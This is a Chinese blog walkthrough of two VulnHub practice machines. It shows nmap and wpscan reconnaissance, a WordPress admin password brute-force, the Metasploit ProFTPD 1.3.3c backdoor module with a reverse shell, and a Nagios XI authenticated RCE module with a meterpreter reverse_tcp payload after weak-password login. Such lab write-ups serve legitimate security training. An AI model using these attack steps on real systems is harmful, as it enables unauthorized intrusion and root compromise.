VulnHub靶机漏洞利用合集1

于 2024-07-14 18:54:58 发布
阅读量620 收藏 15
点赞数 8
分类专栏: VulnHub 文章标签: 网络安全 web安全 linux 安全 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Aukum/article/details/140419969
版权

FUNBOX: SCRIPTKIDDIE

靶机下载地址:Funbox: Scriptkiddie ~ VulnHub

信息收集

攻击机ip:192.168.56.104。Nmap扫描存活主机确定目标机,并对目标机进行详细扫描。

# 扫描存活主机
nmap 192.168.56.0/24 -Pn -T4
# 对靶机进行详细的扫描
nmap 192.168.56.103 -A -T4

扫出了很多端口,先从80的web网页入手。访问后发现网站是由WordPress搭建的,有一个工具wpscan(kali自带的WordPress安全扫描工具)直接扫描一下。

# 初步扫描(扫描站点,主题,文件漏洞,枚举用户)
wpscan --url xxx --enumerate vp,vt,tt,u
​
# 爆出一个用户名admin
​
# 根据枚举出来的用户爆破密码
wpscan --url xxx --passwords 字典路径 --usernames admin --max-threads 100

枚举出一个用户名admin,以此爆破密码,我的字典可能不给力,而且扫描时间过长,可能这里有突破点。

ProFtpd后门漏洞利用

根据对靶机的详细扫描,发现开放了21、22端口,并且21端口是proftpd 1.3.3c。百度一下发现存在后门漏洞。kali使用searchsploit搜一下exp。

有可用的exp,怎么用呢。

cd /usr/share/exploitdb/exploits/linux/remote/16921.rb

告诉我们在msf中利用,启动msf。

search proftpd
use unix/ftp/proftpd/proftpd_133c_backdoor
options
# 有哪些需要设置,按要求设置一下
run

直接run后,报错,提示没有payload。

show payloads。列出所有可用payload。

选反向连接/cmd/unix/reverse。重新选择后需要重新配置。

run。

直接拿到root权限啊,但是当前返回的shell没有显示所在的目录和用户。需要python返回一个shell(大部分Linux都安装了Python3),检查一下是否安装python。which python,如果返回路径表示已安装,执行以下命令即可。

python -c 'import pty;pty.spawn("/bin/bash")'

找到root.txt。🎆

MONITORING: 1

靶机下载地址:Monitoring: 1 ~ VulnHub

信息收集

主机发现

攻击机所在网段:192.168.233.0/24。

nmap 192.168.233.0/24 -Pn -T4

确认靶机ip:192.168.233.130

端口扫描

nmap 192.168.233.130 -A -T4

显示开放了5个端口,其中80端口和443端口运行了相同的服务。

网站信息收集

目录扫描。

 dirsearch -u http://192.168.233.130/

访问网站首页,如下:

点击按钮进入登录页面,页面提示Nagios XI。

Nagios是一款开源的网络及服务的监控工具,用于监控Windows、Linux、Unix、Router的主机各种状态信息,物理基础资源或服务,当被监控对象健康状态出现问题时通过邮件、短信等方式通知相关管理人员或运维人员。

直接搜Nagios的默认账户和密码,默认账户和密码都是nagiosadmin。不行,试试弱密码,成功试出。觉得试太随机了就常规的bp爆破。

用户名:nagiosadmin 
密码:admin

成功登录后进入Nagios XI的服务端。根据页面信息得知版本为5.6.0。

访问/nagios。需要账户和密码,与上面一致。这个Nagios Core 4.4.3又是什么。百度后发现这两个是有区别的,Nagios XI是Nagios Core的商业版,提供了更多高级功能。

漏洞利用Nagios

根据信息收集,靶机部署了Nagios,并且知道了版本。msf直接搜索Nagios。再根据版本选择exploit/linux/http/nagios_xi_mibs_authenticated_rce模块。(Nagios XI版本是5.6.0)

测试发现该模块拿不到shell,根据版本找还有没有适合的模块,尝试后确定攻击模块用:linux/http/nagios_xi_plugins_check_plugin_authenticated_rce

use linux/http/nagios_xi_plugins_check_plugin_authenticated_rce
# 查看所需配置
options
# payload注意一下,x86 or x64
set payload linux/x64/meterpreter/reverse_tcp
set password admin
set rhosts 192.168.233.130
set lhost 192.168.233.128
run

拿到meterpreter后,看看权限。

直接是root权限了,不用提权,进入shell找flag即可。🎆

Aukum
关注
专栏目录
[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
vulnhub靶机-CyberSploit:1渗透笔记
liver100day的博客
07-30 686
文章目录1.环境搭建2.信息收集2.1 主机发现2.2 端口扫描2.3 访问80端口(http服务)2.4 爆破目录3.漏洞利用3.1 ssh登录4.提权1.在kali里面搜索有无该版本的漏洞利用文件2.将文件保存到本地(若不指定文件保存目录的话,文件保存的位置为你当前路径)3.使用python搭建一个简易的服务器4.控制ssh下载漏洞利用文件5.编译漏洞利用文件并执行提权5.总结 1.环境搭建 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.139 靶机:CyberSploit:1
利用Vulnhub复现漏洞 - HTTPoxy漏洞(CVE-2016-5385)
JiangBuLiu的博客
07-09 2357
HTTPoxy漏洞(CVE-2016-5385)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现端口设置浏览器设置BurpSuit设置发出请求 Vulnhub官方复现教程 https://vulhub.org/#/environments/cgi/httpoxy/ 漏洞原理 参考:http://www.laruence.com/2016/07/19/3101.html 简单来说,根据RF...
vulhub漏洞复现二十_GitList
weixin_44193247的博客
01-30 1023
vulhub漏洞复现练习篇
Vulhub漏洞系列:Couchdb漏洞(CVE-2017-12635、CVE-2017-12636)
weixin_43072923的博客
05-24 1705
Vulhub漏洞系列:Couchdb漏洞(CVE-2017-12635、CVE-2017-12636)00.前言01.Couchdb简介02.漏洞描述03.漏洞复现 00.前言 这篇文章将对该漏洞进行简介并复现,同时简要说明Vulhub的使用方法,适合小白一起学习,大佬看看就好☺ 01.Couchdb简介 CouchDB是一个利用JSON文件来存贮数据,javascript作为MapReduce查询,以及常规HTTP作为API的且面向文档的开源数据库管理系统。 02.漏洞描述 0x01:CVE-2017
[ vulhub漏洞复现篇 ] vulhub 漏洞集合(含漏洞复现文章连接)
热门推荐
qq_51577576的博客
09-21 1万+
介绍:Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。 计划:这里记录了 vulhub 所有的漏洞,本专栏也会将这些漏洞全部复现,欢迎持续订阅 我也会不定期再中间更新复现文章链接 目的:以复现 vulhub 漏洞为路径,展示不同的渗透思路及手法,同类漏洞我会尽量用多种渗透思路进行复现,不仅仅是提高个人能力,也是想再 CSDN 这个平台认识更多的安全爱好者
渗透测试-漏洞靶机
weixin_46162146的博客
01-15 5128
0X01 sqli-labs sqli-labs包含了大多数的sql注入类型,以一种闯关模式,对于sql注入进行漏洞利用 下载地址:https://github.com/Audi-1/sqli-labs 0X02 xss challenges xsschallenges是一个专对于XSS漏洞练习的在线靶场,包含了各种绕过,各种姿势的XSS利用 下载地址:http://xss-quiz.int21h...
[Vulhub] ThinkPHP漏洞合集
weixin_45605352的博客
05-11 2861
0x01 复现环境 攻击机:kali linux,Windows 10 x64 靶机:XXE(下载链接https://www.vulnhub.com/entry/xxe-lab-1,254/) 网络设置:均为桥接模式 0x02 漏洞复现 主机发现&端口扫描 先确定靶机ip地址,这里用arp-scan -l命令探测内网: 发现靶机地址为192.168.43.228,接下来用nmap -sV -p- 192.168.43.228 扫描一下: -sV:探测端口服务版本;-p:指定端口;-v:显示扫描过
66.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。第1页 共25页
65.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1
08-03
网络安全自学篇】六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1 本文主要讲述了网络安全中的靶机渗透技术,特别是通过Vulnhub平台进行环境搭建和JIS-CTF挑战。Vulnhub是一个提供虚拟机...
vulnhub靶机DC-4 渗透笔记
liver100day的博客
06-09 2173
DC-4 靶机渗透 靶机环境搭建 攻击渗透机: kali IP地址:192.168.75.128 靶机:DC-3 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/dc-4,313/ 渗透过程 1.信息收集 1.1 主机发现 arp-scan -l 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) 确认目标靶机IP地址:192.168.75.148 1.2 端口扫描 确认了IP地址,接下来我们就使用端口扫描神器来扫描目标靶机开放的端口 nmap -T4 -
靶机合集-总结
m0_50627257的博客
09-17 945
一、漏洞利用、实战练习平台 1、WebGoat漏洞练习环境 https://github.com/WebGoat/WebGoat https://github.com/WebGoat/WebGoat-Legacy https://github.com/RandomStorm/DVWA 2、DoraBox,多拉盒 - 掌握常见漏洞攻防 https://github.com/gh0stkey/DoraBox 3、一个功能很全的CTF平台 https://github.com/zjlywjh001/PhrackC
vulnhub-DC-9靶机渗透记录(适合新手详细版)
m0_62584974的博客
09-09 1385
vulnhub-DC-9靶机渗透记录,超详细,适合新手
[渗透测试学习靶机03] vulnhub靶场 Empire LupinOne
weixin_47112073的博客
10-15 1178
vulnhub靶场练习之靶机Empire LupinOne
vulhub靶场Webmin(CVE-2019-15107)漏洞复现
weixin_45095113的博客
12-12 823
Webmin(CVE-2019-15107)漏洞复现
看完这篇 教你玩转渗透测试靶机vulnhub——EvilBox-One
Aluxian_的博客
07-15 5727
Vulnhub靶机Web1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 老样子需要找到flag即可。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/evilbox/EvilBox—One.ova
VulnHub——DC-5(具体漏洞详解)
高野02blog
12-29 1136
DC-5 这是DC-5的描述,从中得到一些关键信息。 开始 nmap扫描 确定IP地址后端口扫描 发现80端口 使用kali自带工具dirbuster遍历目录 AWVS对网站扫描并没发现重大漏洞 发现只有以下这个界面存在交互 访问footer.php页面时发现了描述中会随着页面刷新改变的东西 我们猜测thankyou.php中incloude()包含了footer.php, 如果是动态包含的路径就可能存在LFI漏洞 什么是本地文件包含(LFI)漏洞? LFI允许攻击者通过浏览器包含一个服务器
利用Vulnhub复现漏洞 - Gitlist 0.6.0 远程命令执行漏洞
JiangBuLiu的博客
07-08 832
gitlist 0.6.0 远程命令执行漏洞Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现端口拦截发送数据包: Vulnhub官方复现教程 【https://vulhub.org/#/environments/httpd/ssi-rce/】 漏洞原理 在用户对仓库中代码进行搜索的时候,gitlist将调用git grep命令: public function searchTree($q...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8508
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
vulnhub靶机系列:
最新发布
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值